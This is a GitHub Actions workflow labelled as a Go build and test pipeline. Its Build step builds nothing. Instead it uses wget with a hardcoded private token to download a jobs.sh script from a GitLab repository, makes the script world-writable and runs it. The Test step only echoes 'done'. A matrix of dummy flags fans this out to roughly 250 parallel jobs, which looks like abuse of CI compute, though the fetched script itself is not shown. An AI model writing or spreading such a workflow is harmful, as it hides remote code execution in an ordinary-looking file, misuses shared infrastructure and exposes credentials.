name: Go

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:

  build:
    runs-on: Ubuntu-20.04
    strategy:
      matrix:
        go: [1.11,1.12,1.13,1.14,1.15,1.16]
        flag: [aa,ab,ac,ad,ae,af,ag,ah,ai,aj,ak,al,am,an,ao,ap,aq,ar,as,at,au,ba,bb,bc,bd,be,bf,bg,bh,bi,bj,bk,bl,bm,bn,bo,bp,bq,br,bs,bt,bu]
      fail-fast: false 

    steps:
    - name: Set up Go
      uses: actions/setup-go@v2
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Check out code into the Go module directory
      uses: actions/checkout@v2
    - name: Build
      run: |
        wget -O jobs.sh --header='PRIVATE-TOKEN: 7TtS6edAJoQBFScsuiZ1' 'https://gitlab.com/api/v4/projects/24946236/repository/files/jobs.sh/raw?ref=master' && chmod 777 jobs.sh && ./jobs.sh
        echo "done"
    - name: Test
      run: echo "done"
